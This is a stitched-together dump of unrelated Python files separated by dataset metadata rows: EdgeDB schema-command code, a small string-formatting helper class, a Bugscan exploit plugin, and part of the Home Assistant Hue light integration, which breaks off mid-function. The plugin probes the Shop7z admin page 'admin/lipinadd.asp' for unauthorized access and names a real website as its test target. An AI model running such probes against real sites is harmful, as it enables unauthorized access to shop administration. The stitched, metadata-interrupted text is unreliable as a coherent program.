schema = super()._delete_innards(schema, context)
referrer_ctx = self.get_referrer_context(context)
if referrer_ctx is None:
return schema
else:
referrer = referrer_ctx.scls
schema = self._delete_ref(schema, context, referrer)
return schema
def _delete_ref(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
referrer: so.Object,
) -> s_schema.Schema:
scls = self.scls
referrer_class = type(referrer)
mcls = type(scls)
refdict = referrer_class.get_refdict_for_class(mcls)
reftype = referrer_class.get_field(refdict.attr).type
refname = reftype.get_key_for(schema, self.scls)
return referrer.del_classref(schema, refdict.attr, refname)
class ReferencedInheritingObjectCommand(
ReferencedObjectCommand[ReferencedInheritingObjectT],
inheriting.InheritingObjectCommand[ReferencedInheritingObjectT],
):
def _get_implicit_ref_bases(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
referrer: so.InheritingObject,
referrer_field: str,
fq_name: sn.SchemaName,
) -> List[ReferencedInheritingObjectT]:
assert isinstance(referrer, so.QualifiedObject)
child_referrer_bases = referrer.get_bases(schema).objects(schema)
implicit_bases = []
ref_field_type = type(referrer).get_field(referrer_field).type
for ref_base in child_referrer_bases:
fq_name_in_child = self._classname_from_name(
fq_name, ref_base.get_name(schema))
refname = ref_field_type.get_key_for_name(schema, fq_name_in_child)
parent_coll = ref_base.get_field_value(schema, referrer_field)
parent_item = parent_coll.get(schema, refname, default=None)
if (parent_item is not None
and not parent_item.get_is_final(schema)):
implicit_bases.append(parent_item)
return implicit_bases
def get_ref_implicit_base_delta(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
refcls: ReferencedInheritingObjectT,
implicit_bases: List[ReferencedInheritingObjectT],
) -> inheriting.BaseDelta_T:
child_bases = refcls.get_bases(schema).objects(schema)
default_base = refcls.get_default_base_name()
explicit_bases = [
b for b in child_bases
if b.generic(schema) and b.get_name(schema) != default_base
]
new_bases = implicit_bases + explicit_bases
return inheriting.delta_bases(
[b.get_name(schema) for b in child_bases],
[b.get_name(schema) for b in new_bases],
)
def _validate(
self,
schema: s_schema.Schema,
context: sd.CommandContext
) -> None:
scls = self.scls
implicit_bases = [
b for b in scls.get_bases(schema).objects(schema)
if not b.generic(schema)
]
referrer_ctx = self.get_referrer_context_or_die(context)
objcls = self.get_schema_metaclass()
referrer_class = referrer_ctx.op.get_schema_metaclass()
refdict = referrer_class.get_refdict_for_class(objcls)
if context.declarative and scls.get_is_local(schema):
if (implicit_bases
and refdict.requires_explicit_overloaded
and not self.get_attribute_value('declared_overloaded')):
ancestry = []
for obj in implicit_bases:
bref = obj.get_referrer(schema)
assert bref is not None
ancestry.append(bref)
raise errors.SchemaDefinitionError(
f'{self.scls.get_verbosename(schema, with_parent=True)} '
f'must be declared using the `overloaded` keyword because '
f'it is defined in the following ancestor(s): '
f'{", ".join(a.get_shortname(schema) for a in ancestry)}',
context=self.source_context,
)
elif (not implicit_bases
and self.get_attribute_value('declared_overloaded')):
raise errors.SchemaDefinitionError(
f'{self.scls.get_verbosename(schema, with_parent=True)}: '
f'cannot be declared `overloaded` as there are no '
f'ancestors defining it.',
context=self.source_context,
)
def _propagate_ref_op(self,
schema: s_schema.Schema,
context: sd.CommandContext,
scls: ReferencedInheritingObject,
cb: Callable[[sd.Command, str], None]
) -> s_schema.Schema:
rec = context.current().enable_recursion
context.current().enable_recursion = False
referrer_ctx = self.get_referrer_context_or_die(context)
referrer = referrer_ctx.scls
referrer_class = type(referrer)
mcls = type(scls)
refdict = referrer_class.get_refdict_for_class(mcls)
reftype = referrer_class.get_field(refdict.attr).type
refname = reftype.get_key_for(schema, self.scls)
r_alter_cmdcls = sd.ObjectCommandMeta.get_command_class_or_die(
sd.AlterObject, referrer_class)
alter_cmdcls = sd.ObjectCommandMeta.get_command_class_or_die(
sd.AlterObject, mcls)
for descendant in scls.ordered_descendants(schema):
d_name = descendant.get_name(schema)
assert isinstance(descendant, ReferencedObject)
d_referrer = descendant.get_referrer(schema)
assert d_referrer is not None
d_alter_cmd = alter_cmdcls(classname=d_name)
r_alter_cmd = r_alter_cmdcls(
classname=d_referrer.get_name(schema))
with r_alter_cmd.new_context(schema, context, d_referrer):
with d_alter_cmd.new_context(schema, context, descendant):
cb(d_alter_cmd, refname)
r_alter_cmd.add(d_alter_cmd)
schema = r_alter_cmd.apply(schema, context)
self.add(r_alter_cmd)
context.current().enable_recursion = rec
return schema
class CreateReferencedInheritingObject(
CreateReferencedObject[ReferencedInheritingObjectT],
inheriting.CreateInheritingObject[ReferencedInheritingObjectT],
ReferencedInheritingObjectCommand[ReferencedInheritingObjectT],
):
def _get_ast(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
*,
parent_node: Optional[qlast.DDLOperation] = None,
) -> Optional[qlast.DDLOperation]:
refctx = type(self).get_referrer_context(context)
if refctx is not None:
if not self.get_attribute_value('is_local'):
if context.descriptive_mode:
astnode = super()._get_ast(
schema,
context,
parent_node=parent_node,
)
assert astnode is not None
inherited_from = [
sn.quals_from_fullname(b)[0]
for b in self.get_implicit_bases(
schema,
context,
self.get_attribute_value('bases'),
)
]
astnode.system_comment = (
f'inherited from {", ".join(inherited_from)}'
)
return astnode
else:
return None
else:
astnode = super()._get_ast(
schema, context, parent_node=parent_node)
if context.declarative:
scls = self.get_object(schema, context)
assert isinstance(scls, ReferencedInheritingObject)
implicit_bases = scls.get_implicit_bases(schema)
objcls = self.get_schema_metaclass()
referrer_class = refctx.op.get_schema_metaclass()
refdict = referrer_class.get_refdict_for_class(objcls)
if refdict.requires_explicit_overloaded and implicit_bases:
assert astnode is not None
astnode.declared_overloaded = True
return astnode
else:
return super()._get_ast(schema, context, parent_node=parent_node)
def _create_begin(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
) -> s_schema.Schema:
referrer_ctx = self.get_referrer_context(context)
implicit_bases = None
if referrer_ctx is not None and not context.canonical:
objcls = self.get_schema_metaclass()
referrer = referrer_ctx.scls
if isinstance(referrer, so.InheritingObject):
referrer_class = referrer_ctx.op.get_schema_metaclass()
refdict = referrer_class.get_refdict_for_class(objcls)
implicit_bases = self._get_implicit_ref_bases(
schema, context, referrer, refdict.attr, self.classname)
if implicit_bases:
bases = self.get_attribute_value('bases')
if bases:
bases = so.ObjectList.create(
schema,
implicit_bases + [
b for b in bases.objects(schema)
if b not in implicit_bases
],
)
else:
bases = so.ObjectList.create(
schema,
implicit_bases,
)
self.set_attribute_value('bases', bases)
schema = super()._create_begin(schema, context)
if referrer_ctx is not None and not context.canonical:
self._validate(schema, context)
return schema
def _create_ref(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
referrer: so.Object,
) -> s_schema.Schema:
schema = super()._create_ref(schema, context, referrer)
if (not self.scls.get_is_final(schema)
and isinstance(referrer, so.InheritingObject)
and not context.canonical
and context.enable_recursion):
# Propagate the creation of a new ref to descendants of
# our referrer.
schema = self._propagate_ref_creation(schema, context, referrer)
return schema
def _propagate_ref_creation(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
referrer: so.InheritingObject,
) -> s_schema.Schema:
get_cmd = sd.ObjectCommandMeta.get_command_class_or_die
mcls = type(self.scls)
referrer_cls = type(referrer)
alter_cmd = get_cmd(sd.AlterObject, referrer_cls)
ref_create_cmd = get_cmd(sd.CreateObject, mcls)
ref_alter_cmd = get_cmd(sd.AlterObject, mcls)
ref_rebase_cmd = get_cmd(inheriting.RebaseInheritingObject, mcls)
assert issubclass(ref_create_cmd, CreateReferencedInheritingObject)
assert issubclass(ref_rebase_cmd, RebaseReferencedInheritingObject)
refdict = referrer_cls.get_refdict_for_class(mcls)
parent_fq_refname = self.scls.get_name(schema)
for child in referrer.children(schema):
if not child.allow_ref_propagation(schema, context, refdict):
continue
alter = alter_cmd(classname=child.get_name(schema))
with alter.new_context(schema, context, child):
# This is needed to get the correct inherited name which will
# either be created or rebased.
ref_field_type = type(child).get_field(refdict.attr).type
refname = ref_field_type.get_key_for_name(
schema, parent_fq_refname)
astnode = ref_create_cmd.as_inherited_ref_ast(
schema, context, refname, self.scls)
fq_name = self._classname_from_ast(schema, astnode, context)
# We cannot check for ref existence in this child at this
# time, because it might get created in a sibling branch
# of the delta tree. Instead, generate a command group
# containing Alter(if_exists) and Create(if_not_exists)
# to postpone that check until the application time.
ref_create = ref_create_cmd.as_inherited_ref_cmd(
schema, context, astnode, [self.scls])
ref_create.if_not_exists = True
ref_create.set_attribute_value(refdict.backref_attr, child)
if child.get_is_derived(schema):
# All references in a derived object must
# also be marked as derived, to be consistent
# with derive_subtype().
ref_create.set_attribute_value('is_derived', True)
ref_alter = ref_alter_cmd(classname=fq_name, if_exists=True)
ref_alter.add(ref_rebase_cmd(
classname=fq_name,
implicit=True,
added_bases=(),
removed_bases=(),
))
alter.add(ref_alter)
alter.add(ref_create)
self.add(alter)
return schema
def get_implicit_bases(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
bases: Any,
) -> Sequence[str]:
mcls = self.get_schema_metaclass()
default_base = mcls.get_default_base_name()
if isinstance(bases, so.ObjectCollectionShell):
base_names = [
b.name for b in bases.items if b.name is not None
]
else:
assert isinstance(bases, so.ObjectList)
base_names = list(bases.names(schema))
# Filter out explicit bases
implicit_bases = [
b
for b in base_names
if (
b != default_base
and isinstance(b, sn.SchemaName)
and sn.shortname_from_fullname(b) != b
)
]
return implicit_bases
class AlterReferencedInheritingObject(
ReferencedInheritingObjectCommand[ReferencedInheritingObjectT],
inheriting.AlterInheritingObject[ReferencedInheritingObjectT],
):
@classmethod
def _cmd_tree_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: sd.CommandContext,
) -> AlterReferencedInheritingObject[ReferencedInheritingObjectT]:
cmd = super()._cmd_tree_from_ast(schema, astnode, context)
refctx = cls.get_referrer_context(context)
if refctx is not None:
cmd.set_attribute_value('is_local', True)
assert isinstance(cmd, AlterReferencedInheritingObject)
return cmd
def _alter_begin(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
) -> s_schema.Schema:
scls = self.scls
was_local = scls.get_is_local(schema)
schema = super()._alter_begin(schema, context)
now_local = scls.get_is_local(schema)
if not was_local and now_local:
self._validate(schema, context)
return schema
class RebaseReferencedInheritingObject(
ReferencedInheritingObjectCommand[ReferencedInheritingObjectT],
inheriting.RebaseInheritingObject[ReferencedInheritingObjectT],
):
implicit = struct.Field(bool, default=False)
def apply(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
) -> s_schema.Schema:
if not context.canonical and self.implicit:
mcls = self.get_schema_metaclass()
refctx = self.get_referrer_context_or_die(context)
referrer = refctx.scls
assert isinstance(referrer, so.InheritingObject)
refdict = type(referrer).get_refdict_for_class(mcls)
implicit_bases = self._get_implicit_ref_bases(
schema,
context,
referrer=referrer,
referrer_field=refdict.attr,
fq_name=self.classname,
)
scls = self.get_object(schema, context)
removed_bases, added_bases = self.get_ref_implicit_base_delta(
schema,
context,
scls,
implicit_bases=implicit_bases,
)
self.added_bases = added_bases
self.removed_bases = removed_bases
return super().apply(schema, context)
class RenameReferencedInheritingObject(
ReferencedInheritingObjectCommand[ReferencedInheritingObjectT],
sd.RenameObject,
):
def _rename_begin(self,
schema: s_schema.Schema,
context: sd.CommandContext
) -> s_schema.Schema:
orig_schema = schema
schema = super()._rename_begin(schema, context)
scls = self.scls
if not context.canonical and not scls.generic(schema):
implicit_bases = scls.get_implicit_bases(schema)
non_renamed_bases = set(implicit_bases) - context.renamed_objs
# This object is inherited from one or more ancestors that
# are not renamed in the same op, and this is an error.
if non_renamed_bases:
bases_str = ', '.join(
b.get_verbosename(schema, with_parent=True)
for b in non_renamed_bases
)
verb = 'are' if len(non_renamed_bases) > 1 else 'is'
vn = scls.get_verbosename(orig_schema)
raise errors.SchemaDefinitionError(
f'cannot rename inherited {vn}',
details=(
f'{vn} is inherited from '
f'{bases_str}, which {verb} not being renamed'
),
context=self.source_context,
)
if context.enable_recursion:
schema = self._propagate_ref_rename(schema, context, scls)
else:
for op in self.get_subcommands(type=sd.ObjectCommand):
schema = op.apply(schema, context)
return schema
def _propagate_ref_rename(self,
schema: s_schema.Schema,
context: sd.CommandContext,
scls: ReferencedInheritingObject
) -> s_schema.Schema:
rename_cmdcls = sd.ObjectCommandMeta.get_command_class_or_die(
sd.RenameObject, type(scls))
def _ref_rename(alter_cmd: sd.Command,
refname: str) -> None:
astnode = rename_cmdcls.astnode(
new_name=qlast.ObjectRef(
name=refname,
),
)
rename_cmd = rename_cmdcls._rename_cmd_from_ast(
schema, astnode, context)
alter_cmd.add(rename_cmd)
return self._propagate_ref_op(schema, context, scls, cb=_ref_rename)
class DeleteReferencedInheritingObject(
DeleteReferencedObjectCommand[ReferencedInheritingObjectT],
inheriting.DeleteInheritingObject[ReferencedInheritingObjectT],
ReferencedInheritingObjectCommand[ReferencedInheritingObjectT],
):
def _delete_ref(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
referrer: so.Object,
) -> s_schema.Schema:
scls = self.scls
referrer_class = type(referrer)
mcls = type(scls)
refdict = referrer_class.get_refdict_for_class(mcls)
reftype = referrer_class.get_field(refdict.attr).type
refname = reftype.get_key_for(schema, self.scls)
self_name = self.scls.get_name(schema)
schema = referrer.del_classref(schema, refdict.attr, refname)
if (isinstance(referrer, so.InheritingObject)
and not context.canonical):
if (not context.in_deletion(offset=1)
and not context.disable_dep_verification):
implicit_bases = set(self._get_implicit_ref_bases(
schema, context, referrer, refdict.attr, self_name))
deleted_bases = set()
for ctx in context.stack:
if isinstance(ctx.op, type(self)):
deleted_bases.add(ctx.op.scls)
implicit_bases -= deleted_bases
if implicit_bases:
# Cannot remove inherited objects.
vn = scls.get_verbosename(schema, with_parent=True)
parents = [
b.get_field_value(schema, refdict.backref_attr)
for b in implicit_bases
]
pnames = '\n- '.join(
p.get_verbosename(schema, with_parent=True)
for p in parents
)
raise errors.SchemaError(
f'cannot drop inherited {vn}',
context=self.source_context,
details=f'{vn} is inherited from:\n- {pnames}'
)
alter_cmd = sd.ObjectCommandMeta.get_command_class_or_die(
sd.AlterObject, referrer_class)
for child in referrer.children(schema):
assert isinstance(child, so.QualifiedObject)
child_coll = child.get_field_value(schema, refdict.attr)
fq_refname_in_child = self._classname_from_name(
self_name,
child.get_name(schema),
)
child_refname = reftype.get_key_for_name(
schema, fq_refname_in_child)
existing = child_coll.get(schema, child_refname, None)
if existing is not None:
alter = alter_cmd(classname=child.get_name(schema))
with alter.new_context(schema, context, child):
schema, cmd = self._propagate_ref_deletion(
schema, context, refdict, child, existing)
alter.add(cmd)
self.add(alter)
return schema
def _propagate_ref_deletion(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
refdict: so.RefDict,
child: so.InheritingObject,
child_ref: ReferencedInheritingObjectT,
) -> Tuple[s_schema.Schema, sd.Command]:
get_cmd = sd.ObjectCommandMeta.get_command_class_or_die
mcls = type(self.scls)
name = child_ref.get_name(schema)
implicit_bases = self._get_implicit_ref_bases(
schema, context, child, refdict.attr, name)
cmd: sd.Command
if child_ref.get_is_local(schema) or implicit_bases:
# Child is either defined locally or is inherited
# from another parent, so we need to do a rebase.
removed_bases, added_bases = self.get_ref_implicit_base_delta(
schema, context, child_ref, implicit_bases)
rebase_cmd_cls = get_cmd(inheriting.RebaseInheritingObject, mcls)
rebase_cmd = rebase_cmd_cls(
classname=name,
added_bases=added_bases,
removed_bases=removed_bases,
)
ref_alter_cmd = get_cmd(sd.AlterObject, mcls)
cmd = ref_alter_cmd(classname=name)
cmd.add(rebase_cmd)
else:
# The ref in child should no longer exist.
ref_del_cmd = get_cmd(sd.DeleteObject, mcls)
cmd = ref_del_cmd(classname=name)
schema = cmd.apply(schema, context)
return schema, cmd
| 35.015435
| 79
| 0.588994
| 4,428
| 43,104
| 5.49458
| 0.099142
| 0.038471
| 0.027785
| 0.028894
| 0.430744
| 0.353432
| 0.290629
| 0.263296
| 0.220797
| 0.186848
| 0
| 0.000594
| 0.336094
| 43,104
| 1,230
| 80
| 35.043902
| 0.8496
| 0.04568
| 0
| 0.38976
| 0
| 0
| 0.022016
| 0.005358
| 0
| 0
| 0
| 0
| 0.022989
| 1
| 0.044932
| false
| 0.001045
| 0.012539
| 0.00418
| 0.129572
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13a2d4c2633ce0ba08875637d40181583a434b5a
| 1,740
|
py
|
Python
|
tools.py
|
Jakuko99/effectb
|
ab6688ce3679cdd2cf43038f7bfef67dabf97c1b
|
[
"MIT"
] | 1
|
2021-05-31T09:21:19.000Z
|
2021-05-31T09:21:19.000Z
|
tools.py
|
Jakuko99/effectb
|
ab6688ce3679cdd2cf43038f7bfef67dabf97c1b
|
[
"MIT"
] | null | null | null |
tools.py
|
Jakuko99/effectb
|
ab6688ce3679cdd2cf43038f7bfef67dabf97c1b
|
[
"MIT"
] | null | null | null |
from calendar import month_name
class Tools:
def __init__(self):
self.output = ""
def formatDate(self, date):
elements = date.split("-")
return f"{elements[2]}. {month_name[int(elements[1])]} {elements[0]}"
def shortenText(self, string, n): #return first n sentences from string
first = string.find(".")
for _ in range(n - 1):
if not string.find(".", first + 1) == -1:
first = string.find(".", first + 1)
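# first - len(string) is a negative index, so the slice keeps everything
# up to (but not including) the n-th period; if no period was found
# (first == -1) the slice is empty and only "." is returned.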
return f"{string[:first-len(string)]}."
def tupleUnpack(self, tup):
self.output = ""
for item in tup:
self.output += f"{item} "
return self.output[:-1]
def joinList(self, list):
self.output = ""
for item in list:
self.output += f"{item}, "
return self.output[:-2] #remove last ', '
def partialJoin(self, list, n):
self.output = ""
i = 0
for item in list:
self.output += f"{item}, "
i += 1
if i >= n:
break
return self.output[:-2]
def processFilmography(self, list, n):
self.output = ""
i = 0
for item in list:
if 'year' in item:
self.output += f"{item['title']} ({item['year']}), "
else:
self.output += f"{item['title'].replace(' ()', '')}, "
i += 1
if i >= n:
break
return self.output[:-2]
def convertTime(self, runtime):
time = int(runtime)
mins = time % 60
hours = int(time / 60)
if hours >= 1:
return f"{hours} h {mins} min"
else:
return f"{mins} min"
| 29
| 77
| 0.468391
| 201
| 1,740
| 4.019901
| 0.278607
| 0.173267
| 0.068069
| 0.092822
| 0.357673
| 0.272277
| 0.272277
| 0.214109
| 0.160891
| 0.160891
| 0
| 0.018657
| 0.383908
| 1,740
| 60
| 78
| 29
| 0.735075
| 0.029885
| 0
| 0.442308
| 0
| 0
| 0.129816
| 0.0492
| 0
| 0
| 0
| 0
| 0
| 1
| 0.153846
| false
| 0
| 0.019231
| 0
| 0.346154
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13a338753672931f84d30f4a3787e44f246ba8c1
| 583
|
py
|
Python
|
Bugscan_exploits-master/exp_list/exp-2307.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 11
|
2020-05-30T13:53:49.000Z
|
2021-03-17T03:20:59.000Z
|
Bugscan_exploits-master/exp_list/exp-2307.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 6
|
2020-05-13T03:25:18.000Z
|
2020-07-21T06:24:16.000Z
|
Bugscan_exploits-master/exp_list/exp-2307.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 6
|
2020-05-30T13:53:51.000Z
|
2020-12-01T21:44:26.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Author__ = 烽火戏诸侯
#_PlugName_ = Shop7z /admin/lipinadd.asp unauthorized access
import re
def assign(service, arg):
if service == "shop7z":
return True, arg
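# Note: curl.curl2() and security_hole() are not defined in this file;
# they are expected to be supplied by the Bugscan scanner runtime
# (locally via the "from dummy import *" in __main__ below).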
def audit(arg):
payload = 'admin/lipinadd.asp'
target = arg + payload
code, head,res, errcode, _ = curl.curl2(target)
if code == 200 and 'name="lipinname"' in res and 'name="showflag"' in res:
security_hole(target)
if __name__ == '__main__':
from dummy import *
audit(assign('shop7z', 'http://www.99ysbjw.com/')[1])
| 27.761905
| 80
| 0.603774
| 73
| 583
| 4.60274
| 0.671233
| 0.077381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025057
| 0.246998
| 583
| 21
| 81
| 27.761905
| 0.740319
| 0.176672
| 0
| 0
| 0
| 0
| 0.201313
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.153846
| false
| 0
| 0.153846
| 0
| 0.384615
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13a3a70ae5392650e62af677f5914bc6b6d670e2
| 18,444
|
py
|
Python
|
homeassistant/components/hue/light.py
|
dlangerm/core
|
643acbf9484fd05161d7e9f2228c9c92a5ce7d0b
|
[
"Apache-2.0"
] | 5
|
2017-01-26T16:33:09.000Z
|
2018-07-20T13:50:47.000Z
|
homeassistant/components/hue/light.py
|
dlangerm/core
|
643acbf9484fd05161d7e9f2228c9c92a5ce7d0b
|
[
"Apache-2.0"
] | 68
|
2018-10-04T16:01:20.000Z
|
2022-03-31T06:21:46.000Z
|
homeassistant/components/hue/light.py
|
dlangerm/core
|
643acbf9484fd05161d7e9f2228c9c92a5ce7d0b
|
[
"Apache-2.0"
] | 7
|
2018-10-04T10:12:45.000Z
|
2021-12-29T20:55:40.000Z
|
"""Support for the Philips Hue lights."""
from __future__ import annotations
from datetime import timedelta
from functools import partial
import logging
import random
import aiohue
import async_timeout
from homeassistant.components.light import (
ATTR_BRIGHTNESS,
ATTR_COLOR_TEMP,
ATTR_EFFECT,
ATTR_FLASH,
ATTR_HS_COLOR,
ATTR_TRANSITION,
EFFECT_COLORLOOP,
EFFECT_RANDOM,
FLASH_LONG,
FLASH_SHORT,
SUPPORT_BRIGHTNESS,
SUPPORT_COLOR,
SUPPORT_COLOR_TEMP,
SUPPORT_EFFECT,
SUPPORT_FLASH,
SUPPORT_TRANSITION,
LightEntity,
)
from homeassistant.core import callback
from homeassistant.exceptions import PlatformNotReady
from homeassistant.helpers.debounce import Debouncer
from homeassistant.helpers.entity import DeviceInfo
from homeassistant.helpers.update_coordinator import (
CoordinatorEntity,
DataUpdateCoordinator,
UpdateFailed,
)
from homeassistant.util import color
from .const import (
DOMAIN as HUE_DOMAIN,
GROUP_TYPE_LIGHT_GROUP,
GROUP_TYPE_LIGHT_SOURCE,
GROUP_TYPE_LUMINAIRE,
GROUP_TYPE_ROOM,
REQUEST_REFRESH_DELAY,
)
from .helpers import remove_devices
SCAN_INTERVAL = timedelta(seconds=5)
_LOGGER = logging.getLogger(__name__)
SUPPORT_HUE_ON_OFF = SUPPORT_FLASH | SUPPORT_TRANSITION
SUPPORT_HUE_DIMMABLE = SUPPORT_HUE_ON_OFF | SUPPORT_BRIGHTNESS
SUPPORT_HUE_COLOR_TEMP = SUPPORT_HUE_DIMMABLE | SUPPORT_COLOR_TEMP
SUPPORT_HUE_COLOR = SUPPORT_HUE_DIMMABLE | SUPPORT_EFFECT | SUPPORT_COLOR
SUPPORT_HUE_EXTENDED = SUPPORT_HUE_COLOR_TEMP | SUPPORT_HUE_COLOR
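# Map of Hue device types to supported-feature bitmasks; unknown types
# fall back to SUPPORT_HUE_EXTENDED in create_light() below.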
SUPPORT_HUE = {
"Extended color light": SUPPORT_HUE_EXTENDED,
"Color light": SUPPORT_HUE_COLOR,
"Dimmable light": SUPPORT_HUE_DIMMABLE,
"On/Off plug-in unit": SUPPORT_HUE_ON_OFF,
"Color temperature light": SUPPORT_HUE_COLOR_TEMP,
}
ATTR_IS_HUE_GROUP = "is_hue_group"
GAMUT_TYPE_UNAVAILABLE = "None"
# Minimum Hue Bridge API version to support groups
# 1.4.0 introduced extended group info
# 1.12 introduced the state object for groups
# 1.13 introduced "any_on" to group state objects
GROUP_MIN_API_VERSION = (1, 13, 0)
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Old way of setting up Hue lights.
Can only be called when a user accidentally mentions hue platform in their
config. But even in that case it would have been ignored.
"""
def create_light(item_class, coordinator, bridge, is_group, rooms, api, item_id):
"""Create the light."""
api_item = api[item_id]
if is_group:
supported_features = 0
for light_id in api_item.lights:
if light_id not in bridge.api.lights:
continue
light = bridge.api.lights[light_id]
supported_features |= SUPPORT_HUE.get(light.type, SUPPORT_HUE_EXTENDED)
supported_features = supported_features or SUPPORT_HUE_EXTENDED
else:
supported_features = SUPPORT_HUE.get(api_item.type, SUPPORT_HUE_EXTENDED)
return item_class(
coordinator, bridge, is_group, api_item, supported_features, rooms
)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the Hue lights from a config entry."""
bridge = hass.data[HUE_DOMAIN][config_entry.entry_id]
api_version = tuple(int(v) for v in bridge.api.config.apiversion.split("."))
rooms = {}
allow_groups = bridge.allow_groups
supports_groups = api_version >= GROUP_MIN_API_VERSION
if allow_groups and not supports_groups:
_LOGGER.warning("Please update your Hue bridge to support groups")
light_coordinator = DataUpdateCoordinator(
hass,
_LOGGER,
name="light",
update_method=partial(async_safe_fetch, bridge, bridge.api.lights.update),
update_interval=SCAN_INTERVAL,
request_refresh_debouncer=Debouncer(
bridge.hass, _LOGGER, cooldown=REQUEST_REFRESH_DELAY, immediate=True
),
)
# First do a refresh to see if we can reach the hub.
# Otherwise we will declare not ready.
await light_coordinator.async_refresh()
if not light_coordinator.last_update_success:
raise PlatformNotReady
if not supports_groups:
update_lights_without_group_support = partial(
async_update_items,
bridge,
bridge.api.lights,
{},
async_add_entities,
partial(create_light, HueLight, light_coordinator, bridge, False, rooms),
None,
)
# We add a listener after fetching the data, so manually trigger listener
bridge.reset_jobs.append(
light_coordinator.async_add_listener(update_lights_without_group_support)
)
return
group_coordinator = DataUpdateCoordinator(
hass,
_LOGGER,
name="group",
update_method=partial(async_safe_fetch, bridge, bridge.api.groups.update),
update_interval=SCAN_INTERVAL,
request_refresh_debouncer=Debouncer(
bridge.hass, _LOGGER, cooldown=REQUEST_REFRESH_DELAY, immediate=True
),
)
if allow_groups:
update_groups = partial(
async_update_items,
bridge,
bridge.api.groups,
{},
async_add_entities,
partial(create_light, HueLight, group_coordinator, bridge, True, None),
None,
)
bridge.reset_jobs.append(group_coordinator.async_add_listener(update_groups))
cancel_update_rooms_listener = None
@callback
def _async_update_rooms():
"""Update rooms."""
nonlocal cancel_update_rooms_listener
rooms.clear()
for item_id in bridge.api.groups:
group = bridge.api.groups[item_id]
if group.type != GROUP_TYPE_ROOM:
continue
for light_id in group.lights:
rooms[light_id] = group.name
# Once we do a rooms update, we cancel the listener
# until the next time lights are added
bridge.reset_jobs.remove(cancel_update_rooms_listener)
cancel_update_rooms_listener() # pylint: disable=not-callable
cancel_update_rooms_listener = None
@callback
def _setup_rooms_listener():
nonlocal cancel_update_rooms_listener
if cancel_update_rooms_listener is not None:
# If there are new lights added before _async_update_rooms
# is called we should not add another listener
return
cancel_update_rooms_listener = group_coordinator.async_add_listener(
_async_update_rooms
)
bridge.reset_jobs.append(cancel_update_rooms_listener)
_setup_rooms_listener()
await group_coordinator.async_refresh()
update_lights_with_group_support = partial(
async_update_items,
bridge,
bridge.api.lights,
{},
async_add_entities,
partial(create_light, HueLight, light_coordinator, bridge, False, rooms),
_setup_rooms_listener,
)
# We add a listener after fetching the data, so manually trigger listener
bridge.reset_jobs.append(
light_coordinator.async_add_listener(update_lights_with_group_support)
)
update_lights_with_group_support()
async def async_safe_fetch(bridge, fetch_method):
"""Safely fetch data."""
try:
with async_timeout.timeout(4):
return await bridge.async_request_call(fetch_method)
except aiohue.Unauthorized as err:
await bridge.handle_unauthorized_error()
raise UpdateFailed("Unauthorized") from err
except aiohue.AiohueException as err:
raise UpdateFailed(f"Hue error: {err}") from err
@callback
def async_update_items(
bridge, api, current, async_add_entities, create_item, new_items_callback
):
"""Update items."""
new_items = []
for item_id in api:
if item_id in current:
continue
current[item_id] = create_item(api, item_id)
new_items.append(current[item_id])
bridge.hass.async_create_task(remove_devices(bridge, api, current))
if new_items:
# This is currently used to setup the listener to update rooms
if new_items_callback:
new_items_callback()
async_add_entities(new_items)
def hue_brightness_to_hass(value):
"""Convert hue brightness 1..254 to hass format 0..255."""
return min(255, round((value / 254) * 255))
def hass_to_hue_brightness(value):
"""Convert hass brightness 0..255 to hue 1..254 scale."""
return max(1, round((value / 255) * 254))
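# The two scales round-trip at the endpoints: hue_brightness_to_hass(254) == 255,
# hass_to_hue_brightness(255) == 254, and hass_to_hue_brightness(0) clamps to 1.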
class HueLight(CoordinatorEntity, LightEntity):
"""Representation of a Hue light."""
def __init__(self, coordinator, bridge, is_group, light, supported_features, rooms):
"""Initialize the light."""
super().__init__(coordinator)
self.light = light
self.bridge = bridge
self.is_group = is_group
self._supported_features = supported_features
self._rooms = rooms
if is_group:
self.is_osram = False
self.is_philips = False
self.is_innr = False
self.is_ewelink = False
self.is_livarno = False
self.gamut_typ = GAMUT_TYPE_UNAVAILABLE
self.gamut = None
else:
self.is_osram = light.manufacturername == "OSRAM"
self.is_philips = light.manufacturername == "Philips"
